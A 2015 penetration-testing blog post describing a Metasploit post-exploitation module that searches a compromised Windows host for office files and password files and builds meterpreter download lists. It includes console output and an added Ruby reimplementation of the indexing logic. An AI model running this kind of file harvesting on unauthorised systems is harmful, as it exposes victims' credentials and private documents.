Monday, February 16, 2015

My GoldDigger Script


A while back I created a post module that would index various types of files so I could more quickly find and decide whether I wanted to download potentially useful files.

I like to look for the passwords.txt/passwords.xls/passwords.doc in addition to other configuration files. Finding and reviewing these can be a bit tedious on the command line.

The script is based on the enum_files post module and it lets you pick the extensions you are interested in as well as which drive to search. Instead of just downloading all those files, it creates two output files per file type (in loot): one that is easy to read and a second that is easy to cut and paste into your meterpreter console to download any files you find interesting.

msf > use post/windows/gather/gold_digger
msf post(gold_digger) > info

       Name: Windows Gather Generic File Collection
     Module: post/windows/gather/gold_digger
   Platform: Windows
       Arch:
       Rank: Normal

Provided by:
  3vi1john
  RageLtMan
  CG

Description:
  This module looks for all office files, creates a list and the path
  to those files to download later if you want (check your loot
  folder). Based on enum_files.rb. Creates two output files in loot.
  one with the raw path and second that is more readable. Notes: Does
  not decend into Users\$user\AppData by default (not sure why). You
  have to force that directory with the SEARCH_FROM option.


msf post(gold_digger) > show options

Module options (post/windows/gather/gold_digger):

   Name         Current Setting             Required  Description
   ----         ---------------             --------  -----------
   FILE_GLOBS   *.doc*,*.xls*,*.ppt*,*.pdf  yes       The file pattern to search for in a filename
   SEARCH_FROM                              no        Search from a specific location. Ex. C:\
   SESSION                                  yes       The session to run this module on.


In action:


[*] Searching C:\Users\ for *.doc* through windows user profile structure
[*] Found C:\Users\user\Documents\Derbycon3.docx adding to the list
[*] Found C:\Users\user\Documents\Speaker Attachments.docx adding to the list
[*] Found C:\Users\user\Desktop\runroute.doc adding to the list
...

[*] Searching C:\Users\ for *.xls* through windows user profile structure
[*] Found C:\Users\user\Documents\servers.xlsx adding to the list

...

[*] Searching C:\Users\ for *.pdf* through windows user profile structure
[*] Found C:\Users\user\Desktop\scan.pdf adding to the list
...
[*] Done!
[*] Post module execution completed


Of course you can also give it full drives like C:\\ or X:\\ or change the extensions you are looking for.
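As an added example (not the gold_digger module's own code), here is the indexing logic described above reproduced in plain Ruby over a constructed list of paths instead of a live session: FILE_GLOBS are matched against filenames, anything under AppData is skipped unless SEARCH_FROM explicitly points inside it, and the two loot outputs per file type (readable listing and paste-ready download lines) are built. The function names, the sample paths and the exact output wording are assumptions.

```ruby
# Added example, not the module's code. Mirrors gold_digger's behaviour on a
# constructed path list; index_paths/loot_outputs and SAMPLE_PATHS are assumed.

# Constructed sample of what a walk of C:\Users\ might return.
SAMPLE_PATHS = [
  'C:\\Users\\user\\Documents\\Derbycon3.docx',
  'C:\\Users\\user\\Documents\\servers.xlsx',
  'C:\\Users\\user\\Desktop\\scan.pdf',
  'C:\\Users\\user\\Desktop\\notes.txt',
  'C:\\Users\\user\\AppData\\Roaming\\passwords.xls',
].freeze

# Default FILE_GLOBS value as shown by "show options".
DEFAULT_GLOBS = '*.doc*,*.xls*,*.ppt*,*.pdf'.freeze

# Return { glob => [matching paths] }. Paths under \AppData\ are skipped
# unless search_from explicitly targets that directory (the module's note).
def index_paths(paths, file_globs: DEFAULT_GLOBS, search_from: nil)
  globs = file_globs.split(',').map(&:strip)
  hits = Hash.new { |h, k| h[k] = [] }
  paths.each do |p|
    # Restrict to SEARCH_FROM when one is given (case-insensitive on Windows).
    next if search_from && !p.downcase.start_with?(search_from.downcase)
    inside_appdata = p.match?(/\\AppData\\/i)
    forced = search_from && search_from.match?(/\\AppData/i)
    next if inside_appdata && !forced
    name = p.split('\\').last
    globs.each do |g|
      hits[g] << p if File.fnmatch(g, name, File::FNM_CASEFOLD)
    end
  end
  hits
end

# Build the two loot outputs for one file type: a readable listing and the
# meterpreter commands ready to paste into the console.
def loot_outputs(glob, hits)
  readable = hits.map { |p| "Found #{p}" }.join("\n")
  paste = hits.map { |p| "download \"#{p}\"" }.join("\n")
  [readable, paste]
end

if __FILE__ == $PROGRAM_NAME
  index_paths(SAMPLE_PATHS).each do |g, files|
    readable, paste = loot_outputs(g, files)
    puts "== #{g} ==", readable, paste
  end
end
```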

You can get it here:
https://github.com/carnal0wnage/Metasploit-Code/blob/master/modules/post/windows/gather/gold_digger.rb

CG

2 comments:

Jaime Chiquita said...

Maybe the access to the directory must be accepted only with privileges for the current user manipulation of the files.

CG said...

I assume you mean the AppData folder. If you manually set it, I think it will index it for you; it just doesn't descend into it.